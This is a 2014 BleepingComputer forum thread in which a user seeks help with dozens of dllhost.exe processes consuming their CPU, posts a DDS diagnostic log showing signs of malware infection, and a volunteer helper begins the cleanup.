Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Multiple instances of dllhost.exe taking up all of my CPU


  • This topic is locked This topic is locked
16 replies to this topic

#1 RaRWolf

RaRWolf

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:01:20 AM

Posted 16 October 2014 - 02:24 PM

A few weeks ago tons of dllhost.exes started opening in my task manager and taking up all of my memory, slowing down my computer exponentially. I've tried using Malwarebytes to detect any viruses but it can't see anything. I deleted my temp folder (Which was about 50-60 GB) and within a few hours all of it was back.

 

I have Windows 8 64 bit, tell me what I need to do.



BC AdBot (Login to Remove)

 


#2 HelpBot

HelpBot

    Bleepin' Binary Bot


  • Bots
  • 12,733 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:20 AM

Posted 21 October 2014 - 02:25 PM

Hello and welcome to Bleeping Computer!

I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************

step1.gif In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/552234 <<< CLICK THIS LINK



If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************

step2.gifIf you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of this page). In that reply, please include the following information:

  • If you have not done so already, include a clear description of the problems you're having, along with any steps you may have performed so far.
  • A new DDS log. For your convenience, you will find the instructions for generating these logs repeated at the bottom of this post.
    • Please do this even if you have previously posted logs for us.
    • If you were unable to produce the logs originally please try once more.
    • If you are unable to create a log please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
    • If you are unsure about any of these characteristics just post what you can and we will guide you.
  • Please tell us if you have your original Windows CD/DVD available.
  • Upon completing the above steps and posting a reply, another staff member will review your topic and do their best to resolve your issues.

Thank you for your patience, and again sorry for the delay.

***************************************************

We need to see some information about what is happening in your machine. Please perform the following scan again:

  • Download DDS by sUBs from the following link if you no longer have it available and save it to your destop.

    DDS.com Download Link
  • Double click on the DDS icon, allow it to run.
  • A small box will open, with an explanation about the tool. No input is needed, the scan is running.
  • Notepad will open with the results.
  • Follow the instructions that pop up for posting the results.
  • Close the program window, and delete the program from your desktop.
Please note: You may have to disable any script protection running if the scan fails to run. After downloading the tool, disconnect from the internet and disable all antivirus protection. Run the scan, enable your A/V and reconnect to the internet.

Information on A/V control can be found HERE.

As I am just a silly little program running on the BleepingComputer.com servers, please do not send me private messages as I do not know how to read and reply to them! Thanks!

#3 RaRWolf

RaRWolf
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:01:20 AM

Posted 21 October 2014 - 05:56 PM

I do not still have my windows install disk.
 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 10.0.9200.16537  BrowserJavaVersion: 10.67.2
Run by RaRWolf at 18:36:28 on 2014-10-21
Microsoft Windows 8  6.2.9200.0.1252.1.1033.18.8156.3560 [GMT -4:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\dwm.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe
C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe
C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe
C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhostex.exe
C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe
C:\Program Files (x86)\ASUS\AI Suite II\Dr.Net\AsDrNotify.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Windows\SysWOW64\PnkBstrA.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\Wacom_Tablet.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Windows\System32\Taskmgr.exe
C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
C:\Program Files\Logitech\SetPointP\SetPoint.exe
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Users\RaRWolf\AppData\Local\FluxSoftware\Flux\flux.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.EXE
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\ASUS\AI Suite II\EPU\EPUHelp.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\CCleaner\CCleaner64.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\unsecapp.exe
svchost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\nacl64.exe
C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\nacl64.exe
C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe
svchost.exe
C:\Users\RaRWolf\AppData\Roaming\uTorrent\uTorrent.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Program Files\Windows Defender\MpCmdRun.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\msiexec.exe
C:\Windows\system32\taskeng.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
-k netsvcs
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\syswow64\dllhost.exe
C:\Program Files (x86)\Steam\Steam.exe
C:\Windows\SysWow64\dllhost.exe
C:\Program Files (x86)\Steam\Steam.exe
C:\Program Files (x86)\Steam\steamerrorreporter.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = www.google.com
uDefault_Page_URL = hxxp://asus13.msn.com
uWindows: Load = C:\Users\RaRWolf\LOCALS~1\Temp\mswuuuq.com
mWinlogon: Userinit = userinit.exe,
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Bing Bar Helper: {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll
BHO: RealNetworks Download and Record Plugin for Internet Explorer: {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Skype Click to Call for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
BHO: Logitech SetPoint: {AF949550-9094-4807-95EC-D1C317803333} - C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
TB: Bing Bar: {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll
uRun: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
uRun: [AdobeBridge] <no file>
uRunOnce: [*c6d67] C:\0c6d674\0c6d674.exe
uRunOnce: [*c6d674] C:\Users\RaRWolf\AppData\Local\Temp\bc50\AppData\Roaming\0c6d674.exe
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [ASUS Ai Charger] C:\Program Files (x86)\ASUS\ASUS Ai Charger\AiChargerAP.exe
mRun: [ASUS Easy Update] C:\Program Files (x86)\ASUS\ASUS Easy Update\ALU.exe
mRun: [ASUSWebStorage] C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\AsusWSPanel.exe /S
mRun: [ASUSPRP] "C:\Program Files (x86)\ASUS\APRP\APRP.EXE"
mRun: [RemoteControl10] "C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [amd_dc_opt] C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [TkBellExe] "C:\Program Files (x86)\Real\RealPlayer\update\realsched.exe"  -osboot
mRun: [Razer Synapse] "C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe"
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [LogMeIn Hamachi Ui] "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\StartUp\REALPL~1.LNK - C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin64\rpsystray.exe
mPolicies-System: PromptOnSecureDesktop = dword:0
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
Trusted Zone: clonewarsadventures.com
Trusted Zone: freerealms.com
Trusted Zone: soe.com
Trusted Zone: sony.com
TCP: NameServer = 192.168.0.1
TCP: Interfaces\{0C84C238-3067-4BDF-9DA6-6575A72DD1BA} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{3A7C171E-187D-4FC1-9BEA-1AFB3A63E092} : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{C8639A44-615F-4F73-81DB-9ED248398997} : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{C8639A44-615F-4F73-81DB-9ED248398997}\14E64627F696461405 : DHCPNameServer = 192.168.43.1
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
AppInit_DLLs= DllInjectHelper.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Bing Bar Helper: {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll
x64-BHO: RealNetworks Download and Record Plugin for Internet Explorer: {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll
x64-BHO: Skype Click to Call for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-BHO: Logitech SetPoint: {AF949550-9094-4807-95EC-D1C317803333} - C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll
x64-TB: Bing Bar: {eec0f710-38b5-4aba-99bf-ec87564a4e13} - 
x64-Run: [AdobeAAMUpdater-1.0] "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
x64-Run: [NvBackend] "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
x64-Run: [ShadowPlay] C:\Windows\System32\rundll32.exe C:\Windows\System32\nvspcap64.dll,ShadowPlayOnSystemStart
x64-Run: [Logitech Download Assistant] C:\Windows\System32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
x64-Run: [XboxStat] "C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe" silentrun
x64-Run: [EvtMgr6] C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s
x64-mPolicies-System: PromptOnSecureDesktop = dword:0
x64-mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
x64-IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
x64-SSODL: WebCheck - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\RaRWolf\AppData\Roaming\Mozilla\Firefox\Profiles\g0sikcyb.default-1384639035960\
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll
FF - plugin: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll
FF - plugin: C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll
FF - plugin: C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\ProgramData\id Software\QuakeLive\npquakezero.dll
FF - plugin: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll
FF - plugin: C:\Users\RaRWolf\AppData\Local\Roblox\Versions\version-58bb25d673384171\NPRobloxProxy.dll
FF - plugin: C:\Users\RaRWolf\AppData\LocalLow\Square Enix\nprun3d.dll
FF - plugin: C:\Users\RaRWolf\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
FF - plugin: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll
.
============= SERVICES / DRIVERS ===============
.
R0 amd_sata;amd_sata;C:\Windows\System32\Drivers\amd_sata.sys [2012-8-22 79528]
R0 amd_xata;amd_xata;C:\Windows\System32\Drivers\amd_xata.sys [2012-8-22 26280]
R2 asComSvc;ASUS Com Service;C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe [2012-9-14 920736]
R2 asHmComSvc;ASUS HM Com Service;C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe [2012-9-14 951936]
R2 AsSysCtrlService;ASUS System Control Service;C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe [2012-9-14 149120]
R2 c2cautoupdatesvc;Skype Click to Call Updater;C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2014-7-14 1390176]
R2 c2cpnrsvc;Skype Click to Call PNR Service;C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2014-7-14 1767520]
R2 Hamachi2Svc;LogMeIn Hamachi Tunneling Engine;C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe [2014-9-4 2525008]
R2 HiPatchService;Hi-Rez Studios Authenticate and Update Service;C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [2013-2-19 9216]
R2 LMIGuardianSvc;LMIGuardianSvc;C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [2014-8-8 377616]
R2 rzpmgrk;rzpmgrk;C:\Windows\System32\Drivers\rzpmgrk.sys [2014-8-12 37184]
R2 rzpnk;rzpnk;C:\Windows\System32\Drivers\rzpnk.sys [2014-8-12 129856]
R3 BazisVirtualCDBus;WinCDEmu Virtual Bus Driver;C:\Windows\System32\Drivers\BazisVirtualCDBus.sys [2011-6-4 198480]
R3 dtsoftbus01;DAEMON Tools Virtual Bus Driver;C:\Windows\System32\Drivers\dtsoftbus01.sys [2013-5-26 283200]
R3 LcUvcUpper;LcUvcUpper Service;C:\Windows\System32\Drivers\LcUvcUpper.sys [2013-10-14 34408]
R3 LEqdUsb;Logitech SetPoint Unifying KMDF USB Filter;C:\Windows\System32\Drivers\LEqdUsb.sys [2014-3-18 77592]
R3 LHidEqd;Logitech SetPoint Unifying KMDF HID Filter;C:\Windows\System32\Drivers\LHidEqd.sys [2014-3-18 13080]
R3 Linksys_adapter_H;Linksys Adapter Network Driver;C:\Windows\System32\Drivers\AE2500w764.sys [2012-12-26 1254464]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\Drivers\mbam.sys [2014-10-7 25816]
R3 NvStreamKms;NvStreamKms;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [2014-5-27 20256]
R3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);C:\Windows\System32\Drivers\nvvad64v.sys [2014-5-27 40392]
R3 RTL8168;Realtek 8168 NT Driver;C:\Windows\System32\Drivers\Rt630x64.sys [2012-9-14 683664]
R3 RZMAELSTROMVADService;Razer Surround Audio Enhancer Service;C:\Windows\System32\Drivers\RzMaelstromVAD.sys [2014-6-9 32768]
R3 ScreamBAudioSvc;ScreamBee Audio;C:\Windows\System32\Drivers\ScreamingBAudio64.sys [2010-7-1 38992]
S1 fsthvckq;fsthvckq;C:\Windows\System32\Drivers\fsthvckq.sys [2014-10-19 55104]
S2 BBSvc;BingBar Service;C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BBSvc.EXE [2014-3-11 193696]
S2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [2014-10-7 1809720]
S2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2014-10-7 860472]
S2 NAUpdate;Nero Update;C:\Program Files (x86)\Nero\Update\NASvc.exe [2012-7-13 769432]
S3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\Windows\System32\Drivers\AtihdW86.sys [2013-4-23 98744]
S3 BBUpdate;BBUpdate;C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.EXE [2014-3-11 247968]
S3 BEService;BattlEye Service;C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [2013-2-3 49152]
S3 Desura Install Service;Desura Install Service;C:\Program Files (x86)\Common Files\Desura\desura_service.exe [2013-6-11 131912]
S3 hidkmdf;KMDF Driver;C:\Windows\System32\Drivers\hidkmdf.sys [2014-6-27 14136]
S3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\Drivers\mwac.sys [2014-10-7 64216]
S3 RTCore64;RTCore64;C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [2013-1-23 13368]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\Drivers\usbaapl64.sys [2012-12-13 54784]
S3 WacHidRouter;Wacom Hid Router;C:\Windows\System32\Drivers\wachidrouter.sys [2014-6-27 95032]
S3 wacomrouterfilter;Wacom Router Filter Driver;C:\Windows\System32\Drivers\wacomrouterfilter.sys [2014-6-27 15160]
S3 WUDFWpdMtp;WUDFWpdMtp;C:\Windows\System32\Drivers\WUDFRd.sys [2012-7-25 198656]
S3 xusb22;Xbox 360 Wireless Receiver Driver Service 22;C:\Windows\System32\Drivers\xusb22.sys [2012-7-25 89088]
.
=============== File Associations ===============
.
FileExt: .reg: Applications\notepad.exe=C:\Windows\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2014-10-21 22:33:12 -------- d--h--w- C:\0c6d674
2014-10-21 09:35:10 75888 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{679CC992-B653-42C6-BDBC-662B695EDEB0}\offreg.dll
2014-10-21 07:00:06 11578928 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{679CC992-B653-42C6-BDBC-662B695EDEB0}\mpengine.dll
2014-10-20 01:20:55 55104 ----a-w- C:\Windows\System32\drivers\fsthvckq.sys
2014-10-19 15:45:51 -------- d-----w- C:\Users\RaRWolf\AppData\Local\PAYDAY
2014-10-18 23:10:42 -------- d-----w- C:\Users\RaRWolf\AppData\Roaming\Ifylqyte
2014-10-17 21:27:45 -------- d-sh--w- C:\found.000
2014-10-17 02:57:29 269992 ----a-w- C:\ProgramData\Microsoft\Windows\Sqm\Manifest\Sqm10248.bin
2014-10-16 03:25:11 10521840 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2014-10-13 22:14:06 -------- d-----w- C:\Windows\LastGood.Tmp
2014-10-13 02:16:56 -------- d-----w- C:\Program Files\CCleaner
2014-10-12 09:55:43 -------- d-----w- C:\reg value hkus
2014-10-12 04:25:12 -------- d-----w- C:\Users\RaRWolf\AppData\Local\Plarium
2014-10-10 18:05:16 -------- d-----w- C:\Users\RaRWolf\Zomboid
2014-10-10 16:55:53 0 ----a-w- C:\Users\RaRWolf\AppData\Roaming\nzhmwb.dll
2014-10-10 16:55:38 81408 ----a-w- C:\Users\RaRWolf\AppData\Roaming\qxigf.dll
2014-10-10 16:55:07 47104 ----a-w- C:\Users\RaRWolf\AppData\Roaming\dbrmh.dll
2014-10-10 12:07:54 -------- d-----w- C:\ProgramData\E1802384DB2718039F19F24F4594560F
2014-10-10 11:57:17 -------- d-----w- C:\Users\RaRWolf\AppData\Local\gamemaker_studio
2014-10-10 11:57:15 -------- d-----w- C:\ProgramData\gamemaker_studio
2014-10-09 01:59:05 -------- d-----w- C:\Users\RaRWolf\AppData\Roaming\AIMP3
2014-10-08 22:45:46 -------- d-----w- C:\Users\RaRWolf\AppData\Roaming\Stykz Help
2014-10-07 22:53:09 122584 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-10-07 22:52:05 91352 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-10-07 22:52:05 64216 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-10-07 22:52:04 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2014-10-07 22:52:03 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-07 02:16:16 -------- d-----w- C:\Users\RaRWolf\AppData\Local\._LiveCode_
2014-10-07 02:15:46 -------- d-----w- C:\Users\RaRWolf\AppData\Roaming\Stykz
2014-10-05 18:34:22 -------- d-----w- C:\FRST
2014-09-25 02:41:23 -------- d-----w- C:\Users\RaRWolf\AppData\Roaming\Construct2
.
==================== Find3M  ====================
.
2014-09-27 18:20:01 348928 ----a-w- C:\Windows\SysWow64\PnkBstrB.xtr
2014-09-27 18:20:01 348928 ----a-w- C:\Windows\SysWow64\PnkBstrB.exe
2014-09-27 18:15:12 280904 ----a-w- C:\Windows\SysWow64\PnkBstrB.ex0
2014-09-22 06:42:39 278152 ------w- C:\Windows\System32\MpSigStub.exe
2014-09-04 15:44:24 46136 ---ha-w- C:\Windows\System32\drivers\Hamdrv.sys
2014-08-17 23:48:48 18960 ----a-w- C:\Windows\System32\drivers\LNonPnP.sys
2014-08-02 00:15:52 505416 ----a-w- C:\Windows\SysWow64\msvcp71.dll
2014-08-02 00:15:52 353864 ----a-w- C:\Windows\SysWow64\msvcr71.dll
2014-07-25 16:55:09 98216 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2014-07-25 14:01:55 1291280 ----a-w- C:\Windows\SysWow64\nvspbridge.dll
2014-07-25 14:01:55 1126480 ----a-w- C:\Windows\SysWow64\nvspcap.dll
2014-07-25 14:01:32 1715224 ----a-w- C:\Windows\System32\nvspbridge64.dll
2014-07-25 14:01:32 1283136 ----a-w- C:\Windows\System32\nvspcap64.dll
2013-08-13 22:03:22 88 ----a-w- C:\Program Files (x86)\update-payday2.bat
.
============= FINISH: 18:39:41.93 ===============
 


#4 Naathim

Naathim

    Bleepin' Minion


  • Members
  • 435 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Poland
  • Local time:07:20 AM

Posted 22 October 2014 - 02:59 AM


Minion%20Welcome.jpg


My name's Naathim and I'm a GeekU Minion! Now that we are mates and will be working together to clean your machine out of any junkware, feel free to call me Naat :)

Before we start please note the following:

icon_arrow.gif Analysis and research take some time, also sometimes real life gets in the way, please be patient.
icon_arrow.gif Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
icon_arrow.gif Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
